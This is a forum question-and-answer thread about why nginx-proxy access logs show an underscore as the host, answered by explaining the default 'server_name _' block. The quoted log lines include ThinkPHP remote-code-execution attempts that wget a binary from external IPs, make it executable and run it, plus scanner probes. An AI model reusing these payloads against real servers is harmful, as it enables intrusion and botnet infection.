-1

I am using jwilder/nginx-proxy on a server, reachable on the public internet. But actually the only counting part should be that it is nginx.

On a regular basis, I check all the logs of my various docker-projects. Of course there are a lot of requests from bots trying to hit any know vulnerability...

And there is one thing I just can't explain to myself: nearly all of there suspicious requests don't show a real domain but just an underline as destination. Here are some example lines:

proxy_1  | nginx.1  | 1.my.RealIP.4 195.54.160.135 - - [12/Jun/2020:14:50:06 +0000] "GET /?XDEBUG_SESSION_START=phpstorm HTTP/1.1" 503 599 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36"
proxy_1  | nginx.1  | 1.my.RealIP.4 31.28.227.190 - - [12/Jun/2020:14:56:59 +0000] "GET / HTTP/1.0" 503 197 "-" "-"
proxy_1  | nginx.1  | 1.my.RealIP.4 195.54.160.135 - - [12/Jun/2020:15:06:57 +0000] "GET /index.php?s=/Index/\x5Cthink\x5Capp/invokefunction&function=call_user_func_array&vars[0]=md5&vars[1][]=HelloThinkPHP HTTP/1.1" 503 599 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36"
proxy_1  | nginx.1  | my.realDomain.com 37.120.196.172 - - [05/Jul/2020:20:49:11 +0000] "GET / HTTP/2.0" 200 3372 "-" "Mozilla/5.0 (X11; Linux x86_64; rv:78.0) Gecko/20100101 Firefox/78.0"
proxy_1  | nginx.1  | my.realDomain.com 37.120.196.172 - - [05/Jul/2020:20:49:11 +0000] "GET /favicon.ico HTTP/2.0" 404 196 "-" "Mozilla/5.0 (X11; Linux x86_64; rv:78.0) Gecko/20100101 Firefox/78.0"
proxy_1  | nginx.1  | _ 76.71.2.171 - - [12/Jun/2020:15:25:46 +0000] "POST /spywall/timeConfig.php HTTP/1.1" 400 157 "-" "XTC"
proxy_1  | nginx.1  | _ 116.99.130.146 - - [12/Jun/2020:15:29:40 +0000] "GET /index.php?s=/index/\x09hink\x07pp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://51.77.73.39/bins/vciamangement.x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp GME.ThinkPHP ; rm -rf thinkphp' HTTP/1.1" 400 157 "-" "Uirusu/2.0"
proxy_1  | nginx.1  | _ 185.158.248.210 - - [12/Jun/2020:15:37:41 +0000] "GET /index.php?s=/index/\x09hink\x07pp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://167.71.185.210/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1" 400 157 "-" "Uirusu/2.0"
proxy_1  | nginx.1  | _ 185.202.2.147 - - [05/Jul/2020:20:45:34 +0000] "\x03\x00\x00/*\xE0\x00\x00\x00\x00\x00Cookie: mstshash=Administr" 400 150 "-" "-"

So, there are requests for a) my IP b) a domain of mine and c) for... underline? What does this underline indicate?

void
  • 178
  • 9

1 Answers1

1

Is seems than the log format you are using declared as $host $remote_addr ... and among the server blocks within your configuration you have some default server block where directive server_name _; is present. Those lines are from requests without HTTP Host header set. When such a request got caught by that server block, the value of $host variable would be exactly an _ (equal to the sting used in server_name directive). Read more about $host nginx internal variable here. And you'd better not to serve such requests as described in this answer.

Ivan Shatsky
  • 2,360
  • 2
  • 6
  • 17